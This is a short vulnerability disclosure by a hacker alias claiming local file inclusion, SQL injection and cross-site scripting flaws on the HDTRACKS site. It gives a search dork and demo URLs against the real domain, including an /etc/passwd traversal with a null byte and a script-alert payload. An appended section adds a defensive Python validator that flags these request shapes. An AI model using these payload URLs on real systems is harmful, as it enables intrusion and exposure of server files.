HDTRACKS suffers from cross site scripting, local file inclusion and remote SQL injection vulnerabilities.
TITLE: HDTRACKS Local File Inclusion and XSS and SQLi
vendor: HDTRACKS
Author: r007k17-w
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
https://facebook.com/r007k17w
Google Dork: © HDtracks 2007 - 2011
-------------------------------------------------------------------------------------------------------------------------------------------
DEMO:
LFI:
1. https://www.hdtracks.com/index.php?file=[LFI]
https://www.hdtracks.com/index.php?file=../../../../../../../../../../../../etc/passwd%00
SQLi:
1. https://www.hdtracks.com/index.php?file=artistdetail&id=4818[SQLi]
XSS:
1. https://www.hdtracks.com/index.php?file="><script>alert(document.domain)</script>
---------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts, L0rd CrUs4d3r, 3ps1lonl4mbd4, A1-w1n6( N17|< ), 1nJ3ct0r t3am and all my friends
----------------------------------------------------------------------------------------------------------
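A defender-side check for the three request shapes listed under DEMO, as an added example that is not part of the original advisory: it validates the `file` and `id` query parameters of `index.php` requests (for log review or an input filter) and reports what is wrong with each. The allowlist contents, the host `shop.example.test`, the finding labels and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: page names the router accepts. Only "artistdetail" appears in the advisory.
ALLOWED_PAGES = {"artistdetail"}
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def fully_decode(value, rounds=3):
    """Decode until stable so nested percent-encoding is inspected in its final form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(url):
    """Return a sorted list of findings for one request URL; an empty list means clean."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    findings = set()
    for raw in query.get("file", []):
        value = fully_decode(raw)
        if "\x00" in value:
            findings.add("file:null-byte")
        if "../" in value or "..\\" in value:
            findings.add("file:path-traversal")
        if re.search(r"[<>\"']", value):
            findings.add("file:markup-characters")
        if value not in ALLOWED_PAGES:
            findings.add("file:not-allowlisted")
    for raw in query.get("id", []):
        if not NUMERIC_ID.fullmatch(fully_decode(raw)):
            findings.add("id:non-numeric")
    return sorted(findings)


# Constructed sample requests (not taken from real logs).
SAMPLE_REQUESTS = [
    "https://shop.example.test/index.php?file=artistdetail&id=4818",
    "https://shop.example.test/index.php?file=../../../../etc/passwd%00",
    "https://shop.example.test/index.php?file=artistdetail&id=4818'",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(classify(request) or ["clean"], request)
```

The same allowlist and integer checks belong in the application itself, with the page name mapped to a fixed include path, the `id` bound as a query parameter, and output HTML-encoded.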